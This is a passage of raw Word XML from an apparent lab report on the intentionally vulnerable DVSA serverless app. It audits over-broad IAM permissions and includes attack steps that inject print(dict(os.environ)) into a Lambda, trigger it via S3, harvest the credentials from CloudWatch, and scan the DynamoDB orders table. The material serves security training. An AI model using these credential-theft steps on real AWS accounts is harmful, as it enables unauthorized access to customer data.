        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB Over-Permission (High Blast Radius)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081107CB" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Table-wide access instead of specific table restriction: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1064B40A" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">arn:aws:dynamodb:REGION:ACCOUNT:table/* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BAD71" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Use of index-level wildcards or unrestricted access patterns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219784F" w14:textId="24737458" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521"/>
    <w:p w14:paraId="76292146" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SES Over-Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE8294" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Unrestricted email service access such as: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33141CE4" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">AmazonSESFullAccess </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A5285A" w14:textId="7C431DFF" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521"/>
    <w:p w14:paraId="4C09D026" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Document Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F831846" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:r w:rsidRPr="00760521">
        <w:t>Record any policies that violate the principle of least privilege, especially where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5347006F" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Access is granted to all resources (*) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E87558" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Permissions are broader than required by function logic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA94B3" w14:textId="77777777" w:rsidR="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t>Sensitive services (S3, DynamoDB, SES) are fully open without restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF96D0C" w14:textId="46F63D18" w:rsidR="00DD17C6" w:rsidRDefault="00DD17C6" w:rsidP="00DD17C6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD17C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: After Seeing the privileges, lets perform the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FF2F1" w14:textId="6C072C1B" w:rsidR="00843BD3" w:rsidRPr="00843BD3" w:rsidRDefault="00843BD3" w:rsidP="00843BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Go to DVSA-SEND-RECEIPT-EMAIL function to insert both print statements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D9571" w14:textId="25243C58" w:rsidR="00843BD3" w:rsidRPr="00843BD3" w:rsidRDefault="00843BD3" w:rsidP="00843BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The credentials are: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F832BB3" w14:textId="0AD5EFFB" w:rsidR="0061341B" w:rsidRPr="0061341B" w:rsidRDefault="00843BD3" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Print(dcit(os.environ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16470EFA" w14:textId="30502D71" w:rsidR="00843BD3" w:rsidRPr="0061341B" w:rsidRDefault="0061341B" w:rsidP="00843BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Go to cloudshell to run the two commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CD425" w14:textId="70E7C698" w:rsidR="0061341B" w:rsidRDefault="0061341B" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0061341B">
        <w:t>touch ~/empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCFFC8E" w14:textId="146F207E" w:rsidR="0061341B" w:rsidRDefault="0061341B" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0061341B">
        <w:t>aws s3 cp ~/empty s3://dvsa-receipts-bucket-454231081197-us-east-1/2020/20/20/trigger.raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183B946" w14:textId="1175091F" w:rsidR="0061341B" w:rsidRDefault="0061341B" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After trigging the lambda function using the command, go to view CloudWatch under Monitor to harvest the credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049BBFEA" w14:textId="3641EC4E" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click on the record that invoked the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5485A6CE" w14:textId="6EEDAB1C" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="0061341B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Harvest the credentials </w:t>
      </w:r>
      <w:r w:rsidR="00FF0FC6">
        <w:t>by using</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301953A6" w14:textId="1D3A92CA" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="002F517F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F517F">
        <w:t>export AWS_ACCESS_KEY_ID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D237844" w14:textId="3E195E76" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="002F517F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F517F">
        <w:t>export AWS_SECRET_ACCESS_KEY=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002F517F">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69944A" w14:textId="34320CBC" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="002F517F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F517F">
        <w:t>AWS_SESSION_TOKEN=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08CB02" w14:textId="60A669FD" w:rsidR="00FF0FC6" w:rsidRDefault="00FF0FC6" w:rsidP="00FF0FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verify that you are like the function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0190AE" w14:textId="01B71030" w:rsidR="00FF0FC6" w:rsidRDefault="00FF0FC6" w:rsidP="00FF0FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0FC6">
        <w:t>aws sts get-caller-identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05169F93" w14:textId="33E0D274" w:rsidR="00FF0FC6" w:rsidRDefault="00FF0FC6" w:rsidP="00FF0FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the command to scan the DB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B530D" w14:textId="5931EA6B" w:rsidR="00FF0FC6" w:rsidRPr="0061341B" w:rsidRDefault="00FF0FC6" w:rsidP="00FF0FC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0FC6">
        <w:t>aws dynamodb scan \ --table-name DVSA-ORDERS-DB \ --region us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB1EDC3" w14:textId="77777777" w:rsidR="00843BD3" w:rsidRDefault="00843BD3" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4892DE" w14:textId="64C5E005" w:rsidR="00843BD3" w:rsidRDefault="00843BD3" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843BD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1630019A" wp14:editId="75A5299E">
            <wp:extent cx="5943600" cy="2534285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40796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3311" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2534285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C77B49" w14:textId="1BF6422A" w:rsidR="0061341B" w:rsidRDefault="0061341B" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061341B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5154F3DD" wp14:editId="79814E21">
            <wp:extent cx="5943600" cy="2978785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113692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22632" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2978785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A848580" w14:textId="62239463" w:rsidR="0061341B" w:rsidRDefault="0061341B" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061341B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A007A40" wp14:editId="4B36AC69">
            <wp:extent cx="5943600" cy="3011805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16247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82614" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3011805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A567B26" w14:textId="1CB4D4FF" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F517F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="605C06FD" wp14:editId="2EA976DE">
            <wp:extent cx="5943600" cy="3013075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93140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8892" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3013075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5BBA2" w14:textId="1EF12BE4" w:rsidR="002F517F" w:rsidRDefault="002F517F" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F517F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252D8134" wp14:editId="5E47D559">
            <wp:extent cx="5943600" cy="2983230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="111767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79571" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2983230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F25B73" w14:textId="68F9E2F8" w:rsidR="00966156" w:rsidRPr="00843BD3" w:rsidRDefault="00966156" w:rsidP="00843BD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00966156">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55854173" wp14:editId="4EA75AC1">
            <wp:extent cx="5943600" cy="3070860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9399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6060" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3070860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E459C3" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="76D37EBD" w14:textId="0393B250" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="2AB207EE" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 5) Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31EF13" w14:textId="6CA05717" w:rsidR="00300EA8" w:rsidRPr="004A3F69" w:rsidRDefault="00300EA8" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00300EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E3A11C1" wp14:editId="59C0FBBC">
            <wp:extent cx="6054918" cy="3207296"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="26127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79052" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120936" cy="3242266"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE70543" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:t>At this stage, we establish the following hypothesis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19FF9" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“The Lambda execution role has significantly more permissions than required for its intended functionality.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22FBFC" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">We will validate this using the </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IAM Policy Simulator</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F29B4F0" w14:textId="542C4ABA" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="4E0F0C1D" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Open IAM Policy Simulator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3250A5D4" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS IAM Console</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF68211" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">In the main dashboard, locate the </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> section. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE8AE07" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Policy Simulator</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226912F1" w14:textId="423BAD18" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69"/>
    <w:p w14:paraId="34087D92" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Select the Execution Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C61198" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">In the IAM Policy Simulator interface, locate the left panel. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9DDFF6" w14:textId="77777777" w:rsidR="004A3F69" w:rsidRPr="004A3F69" w:rsidRDefault="004A3F69" w:rsidP="004A3F69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve">Change the </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identity Type</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3F69">
        <w:t xml:space="preserve"> from </w:t>
